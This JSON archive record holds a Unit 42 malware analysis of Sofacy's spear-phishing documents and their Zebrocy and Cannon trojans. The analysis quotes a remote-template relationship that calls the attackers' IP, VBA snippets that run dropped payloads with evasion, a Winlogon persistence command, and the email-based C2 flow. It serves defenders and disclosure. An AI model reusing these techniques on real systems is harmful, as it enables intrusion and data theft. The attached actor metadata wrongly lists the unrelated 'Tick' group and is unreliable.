{
	"id": "8c8dcf7c-9f20-4529-bc98-08c82ba6cb44",
	"created_at": "2026-04-06T00:17:19.32552Z",
	"updated_at": "2026-04-10T03:37:50.285242Z",
	"deleted_at": null,
	"sha1_hash": "546eeca67bc1d06024b5481814e603853a6d7950",
	"title": "Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1061126,
	"plain_text": "Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’\r\nTrojan\r\nBy Robert Falcone, Bryan Lee\r\nPublished: 2018-11-20 · Archived: 2026-04-05 16:47:07 UTC\r\nIn late October and early November 2018, Unit 42 intercepted a series of weaponized documents that use a\r\ntechnique to load remote templates containing a malicious macro. These types of weaponized documents are not\r\nuncommon but are more difficult to identify as malicious by automated analysis systems due to their modular\r\nnature. Specific to this technique, if the C2 server is not available at the time of execution, the malicious code\r\ncannot be retrieved, rendering the delivery document largely benign.\r\nThe weaponized documents targeted several government entities around the globe, including North America,\r\nEurope, and a former USSR state. Fortunately for us, the C2 servers for several of these documents were still\r\noperational, allowing for retrieval of the malicious macro and the subsequent payloads. Analysis revealed a\r\nconsistent first-stage payload of the well-documented Zebrocy Trojan. Additional collection of related documents\r\nrevealed a second first-stage payload that we have named ‘Cannon’. Cannon has not been previously observed in\r\nuse by the Sofacy group and contains a novel email-based C2 communication channel. Email as a C2 channel is\r\nnot a new tactic, but it is generally not observed in the wild as often as HTTP or HTTPS. Using email as a C2\r\nchannel may also decrease the chance of detection, as sending email via non-sanctioned email providers may not\r\nnecessarily constitute suspicious or even malicious activity in many enterprises.\r\nThe activity discussed in this blog revolves around two of the multitude of weaponized documents that we\r\ncollected. These two documents shared multiple data artifacts, such as a shared C2 IP, shared author name, and\r\nshared tactics. 
Details of the extended attack campaign associated with the Cannon Trojan will be discussed in a\r\nlater blog. A particularly interesting aspect of one of the two documents we analyzed was the filename used, crash\r\nlist(Lion Air Boeing 737).docx. This is not the first instance of an adversary group using recent current events as a\r\nlure, but it is interesting to see this group attempt to capitalize on the attention of a catastrophic event to execute\r\ntheir attack.\r\nAttack Details\r\nThe initial sample we intercepted was a Microsoft Word document (SHA256:\r\n2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f) with the filename crash list(Lion Air\r\nBoeing 737).docx using the author name Joohn. This document appeared to be targeting a government\r\norganization dealing with foreign affairs in Europe via spear-phishing. Once the user attempts to open the\r\ndocument, Microsoft Word immediately attempts to load the remote template containing a malicious macro and\r\npayload from the location specified within the settings.xml.rels file of the DOCX document, as seen here:\r\n\u003cRelationship Id=\"rId1\"\r\nType=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate\"\r\nhttps://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/\r\nPage 1 of 11\n\nTarget=\"hxxp://188.241.58[.]170/live/owa/office.dotm\" TargetMode=\"External\"/\u003e\r\nIf the C2 has already been taken offline the document will still open, but Word will be unable to retrieve the\r\nremote template and thus Word will not load a macro. In this situation, Word will present the same lure document\r\nto the victim as seen in Figure 2, but without the ability to enable macros via an Enable Content button. 
Assuming\r\nthe C2 is still operational, however, Word loads the remote template (SHA256:\r\nf1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5) and the user is presented with the\r\nscreen seen in Figure 1.\r\nFigure 1 Lure screen\r\nOnce the victim presses the Enable Content button, the embedded macro is executed. The macros in these\r\ndelivery documents use the less common AutoClose function as their entry point. This is a form of anti-analysis, as\r\nWord will not fully execute the malicious code until the user closes the document. If an automated sandbox exits\r\nits analysis session without specifically closing the document, the sandbox may miss the malicious activity\r\nentirely. Once successfully executed, the macro will install a payload and save a document to the system.\r\nTypically, we expect to see a decoy document saved to the system and later displayed to make the victim less\r\nsuspicious of malicious activity; however, in this case the document saved to the system was never displayed and\r\ndoes not contain any content pertinent to the Lion Air tragedy theme seen in the filename. The macro obtains the\r\ndocument it saves to the system from the UserForm1.Label1.Caption property of the delivery document and writes it to:\r\n%TEMP%\\~temp.docm\r\nThe macro obtains the payload it saves to the system from the UserForm1.Label2.Caption property of the\r\ndelivery document and writes it to:\r\n%APPDATA%\\MSDN\\~msdn.exe\r\nThe macro executes this payload in a rather interesting way by loading the dropped ~temp.docm document and\r\ncalling a function within its embedded macro to run the payload. We believe the creator of this delivery document\r\nchose to run the payload from the dropped file as an evasion technique. 
Also, the fact that the initial macro uses this\r\ndropped document for the execution of the payload may also explain why the document did not contain any decoy\r\ncontents.\r\nTo carry out this functionality, after writing the ~temp.docm and ~msdn.exe files to the system, the initial macro\r\nloads the ~temp.docm file as a Word Document object and attempts to run the function Proc1 in the Module1\r\nmacro within the ~temp.docm file, as seen in the following code snippet:\r\n' Open the dropped document in a hidden Word instance and invoke its macro\r\nSet WA = CreateObject(\"Word.Application\")\r\nWA.Visible = False\r\nSet oMyDoc = WA.Documents.Open(vF)\r\nWA.Application.Run \"Module1.Proc1\"\r\nThe Proc1 function within Module1 does nothing more than build the %APPDATA%\\MSDN\\~msdn.exe path\r\nto the dropped payload and execute it using the built-in Shell function, as seen in the following code snippet:\r\n' The \".exe\" extension is assembled from fragments to avoid a plain string match\r\nvAdd = \"~msdn\"\r\nvFileName = Environ(\"APPDATA\") \u0026 \"\\MSDN\\\"\r\nvFileName = vFileName + vAdd \u0026 \".e\" + \"x\" \u0026 \"e\"\r\nShell vFileName\r\nThe payload dropped to the system (SHA256:\r\n6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a) is a UPX-packed Zebrocy variant\r\nwritten in Delphi. This variant of Zebrocy is functionally very similar to the Delphi-based payloads\r\ndiscussed in our previous publication on Sofacy attacks using Zebrocy earlier this year. The developer of this\r\nparticular payload configured it to use the following URL as its C2:\r\nhxxp://188.241.58[.]170/local/s3/filters.php\r\nThe Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST\r\nrequest to the above URL. 
Like other Zebrocy samples, this Trojan collects system specific information it will\r\nsend to the C2 server by running the command SYSTEMINFO \u0026 TASKLIST on the command line and by\r\nenumerating information about connected storage devices. This specific variant of Zebrocy will also send a\r\nscreenshot of the victim host as a JPEG image to the C2 server. The C2 server will then provide a secondary\r\npayload to the beacon in ASCII hexadecimal representation, which the Trojan will decode and write to the\r\nfollowing location:\r\n%APPDATA%\\Roaming\\Audio\\soundfix.exe\r\nDuring our analysis, the C2 server provided a secondary payload that functionally appeared similar to the initial\r\nZebrocy sample. The secondary payload was also written in Delphi and its developer configured it to\r\ncommunicate with its C2 server using HTTPS via the following URL:\r\nhxxps://200.122.181[.]25/catalog/products/books.php\r\nNew Cannon Trojan\r\nWe were able to collect a second delivery document that shared the Joohn author with the crash list(Lion Air\r\nBoeing 737).docx document, as well as the 188.241.58[.]170 C2 IP hosting its remote template. Structurally this\r\nsample was very similar to the initially analyzed document, but the payload turned out to be a completely new tool,\r\nwhich we have named Cannon.\r\nThe tool is written in C#, and its malicious code exists in a namespace called cannon, which is the basis of the\r\nTrojan’s name. The Trojan functions primarily as a downloader that relies on emails to communicate between the\r\nTrojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email\r\naddresses via SMTPS over TCP port 587. The specific functions of Cannon can be seen in Table 1. 
This tool also\r\nhas a heavy reliance on EventHandlers with timers to run its methods in a specific order and potentially increase\r\nits evasion capability.\r\nFunction | Description | Timer (seconds)\r\nstart_Tick | Adds persistence and generates unique system specific identifier | 1\r\ninf_Tick | Gathers system information | 300\r\nscreen_Tick | Takes a screenshot of the desktop | 10\r\ntxt_Tick | Logs into primary POP3 account and gets secondary POP3 account | 120\r\nload_Tick | Logs into secondary POP3 account to download attachment to email | 120\r\nsubject_Tick | Logs into primary POP3 account to get the path for the downloaded attachment | 120\r\nrun_Tick | Moves the downloaded attachment to path and creates a process with attachment | 60\r\nTable 1 Functions executed by Cannon and their purpose\r\nThe overall purpose of Cannon is to use several email accounts to send system data (system information and\r\nscreenshot) to the threat actors and to ultimately obtain a payload from an email from the actors. The image in\r\nFigure 2, together with the following step-by-step process, illustrates how Cannon communicates with the actor-controlled C2 email address to obtain a secondary payload:\r\nFigure 2 C2 process flow for Cannon\r\n1. Cannon gathers system information and saves it to a file named i.ini. The Trojan sends an email to\r\nsahro.bella7[at]post.cz with i.ini as the attachment, S_inf within the body and a subject with a unique\r\nsystem identifier via SMTPS from one of the following accounts:\r\nBishtr.cam47\r\nLobrek.chizh\r\nCervot.woprov\r\n2. Cannon takes a screenshot and saves it to a file named sysscr.ops. 
The Trojan sends an email to\r\nsahro.bella7[at]post.cz with sysscr.ops as the attachment, the string SCreen within the body and a subject\r\nwith the unique system identifier via SMTPS from one of the three previously used accounts.\r\n3. The actors likely log into sahro.bella7[at]post.cz and process the system information and screenshot sent by\r\nthe Trojan to determine if the compromised host is of interest. If the actor wishes to download an additional\r\npayload to the compromised host, they will respond by sending emails as in the following steps.\r\n4. The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as the subject and a\r\nsecondary email account and credentials in ASCII hexadecimal format within the message body. This\r\nsecondary email account is unknown at this time, so we will refer to it as \"secondary email account\" in\r\nfuture steps.\r\n5. The actor sends an email to the secondary email account with the unique system identifier as the subject and\r\na secondary payload attached with a filename of txt.\r\n6. Cannon logs into the trala.cosh2[at]post.cz account via POP3S looking for emails with a subject that\r\nmatches the unique system identifier. Cannon opens the email with the correct subject and decodes the\r\nhexadecimal data in the body of the message to obtain the secondary email account.\r\n7. Cannon acknowledges the receipt of the secondary email address by sending an email\r\nto sahro.bella7[at]post.cz with s.txt (contains {SysPar = 65} string) as the attachment, ok within the body\r\nand a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1.\r\n8. The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as the subject and a file\r\npath that the Cannon Trojan will use to save the secondary payload.\r\n9. Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches\r\nthe unique system identifier. 
Cannon opens the email with the correct subject and saves the attachment\r\nnamed auddevc.txt.\r\n10. Cannon acknowledges the receipt of the file download by sending an email to sahro.bella7[at]post.cz with l.txt\r\n(contains 090 string) as the attachment, ok2 within the body and a subject with the unique system identifier\r\nvia SMTPS from one of the three accounts from Step 1.\r\n11. Cannon logs into the trala.cosh2[at]post.cz account via POP3S looking for emails with a subject that\r\nmatches the unique system identifier. Cannon opens the email with the correct subject and decodes the\r\nhexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded\r\nauddevc.txt file.\r\n12. Cannon acknowledges the receipt of the file path by sending an email to sahro.bella7[at]post.cz with s.txt\r\n(contains {SysPar = 65} string) as the attachment, ok3 within the body and a subject with the unique\r\nsystem identifier via SMTPS from one of the three accounts from Step 1.\r\n13. Cannon moves the downloaded file to the specified path.\r\n14. Cannon acknowledges the successful move by sending an email to sahro.bella7[at]post.cz with l.txt\r\n(contains 090 string) as the attachment, ok4 within the body and a subject with the unique system identifier\r\nvia SMTPS from one of the three accounts from Step 1.\r\n15. Cannon runs the downloaded file from the specified path.\r\n16. 
Cannon acknowledges the successful execution by sending an email to sahro.bella7[at]post.cz with s.txt\r\n(contains {SysPar = 65} string) as the attachment, ok5 within the body and a subject with the unique\r\nsystem identifier via SMTPS from one of the three accounts from Step 1.\r\nFor a complete analysis of Cannon, please refer to the Appendix.\r\nConclusion\r\nThe Sofacy threat group continues to target government organizations in the EU, US, and former Soviet states to\r\ndeliver the Zebrocy tool as a payload. In these attacks, the delivery documents used to install Zebrocy used remote\r\ntemplates, which makes the attack harder to analyze, as an active C2 server is needed to obtain the macro-enabled document. The Sofacy group also leveraged the recent Lion Air disaster as a lure in one of these attacks,\r\nwhich continues to show a willingness to use current events in their social engineering themes.\r\nOf note, we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan\r\ncalled Cannon. Cannon uses SMTPS and POP3S as its C2 channel, whereas Zebrocy uses the more\r\ncommonly observed HTTP or HTTPS based C2. This is not a new tactic but may be more effective at evading\r\ndetection as the external hosts involved belong to a legitimate email service provider. 
Add the layer of encryption that\r\nthe SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2\r\nchannel to block.\r\nWhile Sofacy’s campaign delivering Zebrocy and Cannon remains active, Palo Alto Networks customers are\r\nprotected from this threat in the following ways:\r\nAutoFocus customers can track these samples with the Zebrocy and Cannon\r\nWildFire detects the delivery documents, Zebrocy and Cannon payloads discussed in this blog with\r\nmalicious verdicts.\r\nTraps blocks the macro-laden remote templates as Suspicious macro detected, as well as Zebrocy and\r\nCannon payloads as Suspicious executable detected.\r\nThe IP addresses hosting remote templates and C2 services in these attacks are classified as Command and\r\nControl.\r\nIndicators of Compromise\r\nDelivery Hashes\r\n2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f\r\naf77e845f1b0a3ae32cb5cfa53ff22cc9dae883f05200e18ad8e10d7a8106392\r\nRemote Template Hashes\r\nf1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5\r\nfc69fb278e12fc7f9c49a020eff9f84c58b71e680a9e18f78d4e6540693f557d\r\nRemote Templates\r\nhxxp://188.241.58[.]170/live/owa/office.dotm\r\nZebrocy Hashes\r\n6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a\r\nZebrocy C2 URLs\r\nhxxp://188.241.58[.]170/local/s3/filters.php\r\nhxxps://200.122.181[.]25/catalog/products/books.php\r\nCannon Hashes\r\n61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e\r\nCannon Email Accounts\r\nsahro.bella7[at]post.cz\r\ntrala.cosh2[at]post.cz\r\nbishtr.cam47[at]post.cz\r\nlobrek.chizh[at]post.cz\r\ncervot.woprov[at]post.cz\r\nAppendix\r\nThe Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate\r\nbetween the Trojan and the C2 server. 
To communicate with the C2 server, the Trojan will send emails to specific\r\nemail addresses via SMTPS over TCP port 587. This tool uses a variety of functions that are run in a specific order\r\nto:\r\nGather system information and a screenshot\r\nSend the gathered information to the actor via an email\r\nCheck inbox for email from actor with payload attached\r\nDownload payload attached to email\r\nExecute downloaded payload\r\nThe functions called to carry out these activities are as follows:\r\nstart_Tick\r\nThis function starts off by writing the string {SysPar = 65} to a file named s.txt, which will be used during C2\r\ncommunications throughout the execution of this Trojan. This function is also responsible for creating persistence\r\nby writing the following to r.bat and executing it:\r\nREG ADD \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Shell /t REG_SZ /d [path to\r\nwsslc.exe]\r\nIt also creates a unique system specific identifier that it will use during the C2 communications to send and\r\nreceive messages. The system specific identifier is a 16-character string that the Trojan creates using the serial\r\nnumber of the C volume and the first 4 hexadecimal bytes from Environment.UserName. 
The start_Tick function\r\nthen begins the timer to run the inf_Tick method.\r\ninf_Tick\r\nResponsible for gathering system information, which it then saves to the i.ini file:\r\nApplication.ExecutablePath\r\nEnvironment.OSVersion\r\nEnvironment.SystemDirectory\r\nEnvironment.UserDomainName\r\nEnvironment.MachineName\r\nEnvironment.UserName\r\nTimeZone.CurrentTimeZone.StandardName\r\nEnvironment.TickCount\r\nDriveInfo.GetDrives() - Name,VolumeLabel,DriveFormat,DriveType,TotalSize,AvailableFreeSpace,Serial\r\nnumber\r\nFolders in C:\\Program Files\\\r\nFolders in C:\\Program Files (x86)\\\r\nProcess.GetProcesses\r\nIt will use the aforementioned authentication credentials to log into the SMTP server to send the i.ini file to the C2\r\nemail address. The email sent to exfiltrate this information will have i.ini attached to it with the unique system\r\nidentifier as the subject and S_inf within the body of the email message. The inf_Tick function then begins the\r\ntimer to run the screen_Tick method.\r\nscreen_Tick\r\nTakes a screenshot of the desktop and saves it to a file named sysscr.ops. It will use the aforementioned\r\nauthentication credentials to log into the SMTP server to send the sysscr.ops file to the C2 email address. The\r\nemail sent to exfiltrate this information will have sysscr.ops file attached to it with the unique system identifier as\r\nthe subject and SCreen within the body of the email message. The screen_Tick function then begins the timer to\r\nrun the txt_Tick method.\r\ntxt_Tick\r\nThe Trojan will attempt to log into pop.seznam[.]cz over POP3s using the account name trala.cosh2[at]post.cz. If\r\nsuccessful, the Trojan will access the messages in the inbox, specifically looking for any emails that have a subject\r\nthat matches the unique system identifier. If an email exists, the Trojan will treat the email's body as hexadecimal\r\nformat and save it to a variable that will be used by the load_Tick function. 
The Trojan will delete the emails after\r\nreading and processing them.\r\nIf the Trojan obtained the text from the email, it will use the aforementioned authentication credentials to log into\r\nthe SMTP server to send the s.txt file to the C2 email address. The email sent to exfiltrate this information will\r\nhave the s.txt file attached to it with the unique system identifier as the subject and the string ok within the body of the\r\nemail message. The txt_Tick function then begins the timer to run the load_Tick method.\r\nload_Tick\r\nThe Trojan will first remove all occurrences of B\u0026 and Db from the text obtained from the email in the txt_Tick\r\nfunction. The Trojan will then split the remaining text on the % character and treat the content to the left of the %\r\ncharacter as an account name and the content to the right as a password. The Trojan uses these credentials to log\r\ninto another email account at pop.seznam[.]cz via POP3s, which it will check for email messages that have the\r\nunique system identifier as the subject. The Trojan will parse emails with the correct subject to obtain their\r\nattachments. The Trojan will save any attachments whose names contain the string auddevc to the system, which\r\nis meant to download a file named auddevc.txt. The Trojan will also create a file named l.txt and write the\r\nstring 090 to it.\r\nIf the Trojan obtained the file from the email, it will use the aforementioned authentication credentials to log into\r\nthe SMTP server to send the l.txt file to the C2 email address. The email sent to exfiltrate this information will\r\nhave the l.txt file attached to it with the unique system identifier as the subject and ok2 within the body of the email\r\nmessage. 
The load_Tick function then begins the timer to run the subject_Tick method.\r\nsubject_Tick\r\nThis function is very similar in functionality to the txt_Tick function. Just like the txt_Tick function, the Trojan\r\nwill attempt to log into pop.seznam[.]cz over POP3s using the account name trala.cosh2@post[.]cz, again looking\r\nfor emails in the inbox whose subject matches the unique system identifier. The Trojan will then treat the body of\r\nthe email as hexadecimal data that it will save to a variable that will be used by the run_Tick function. The\r\ncontents saved to the variable should be the path to which the actor wishes the file saved in the load_Tick function\r\nto be moved and from which it should be run.\r\nIf the Trojan obtained the text from the email, it will use the aforementioned authentication credentials to log into\r\nthe SMTP server to send the s.txt file to the C2 email address. The email sent to exfiltrate this information will\r\nhave the s.txt file attached to it with the unique system identifier as the subject and ok3 within the body of the email\r\nmessage. The subject_Tick function then begins the timer to run the run_Tick method.\r\nrun_Tick\r\nThe Trojan will first attempt to create the directory within the path obtained from the email in the\r\nsubject_Tick function. It then attempts to move the auddevc.txt file downloaded in the load_Tick function to the\r\nnewly created directory. If the file was successfully moved, the Trojan will use the aforementioned\r\nauthentication credentials to log into the SMTP server to send the l.txt file to the C2 email address. The email sent\r\nto exfiltrate this information will have the l.txt file attached to it with the unique system identifier as the subject and\r\nok4 within the body of the email message.\r\nThe Trojan then attempts to create a process using the newly moved downloaded file. 
If the Trojan was able to\r\nsuccessfully run the downloaded file, it will use the aforementioned authentication credentials to log into the SMTP\r\nserver to send the s.txt file to the C2 email address. The email sent to exfiltrate this information will have the s.txt file\r\nattached to it with the unique system identifier as the subject and ok5 within the body of the email message. The\r\nTrojan would then delete the sysscr.ops screenshot file and the i.ini system information file before exiting.\r\nSource: https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/"
	],
	"report_names": [
		"unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan"
	],
	"threat_actors": [
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434639,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/546eeca67bc1d06024b5481814e603853a6d7950.pdf",
		"text": "https://archive.orkl.eu/546eeca67bc1d06024b5481814e603853a6d7950.txt",
		"img": "https://archive.orkl.eu/546eeca67bc1d06024b5481814e603853a6d7950.jpg"
	}
}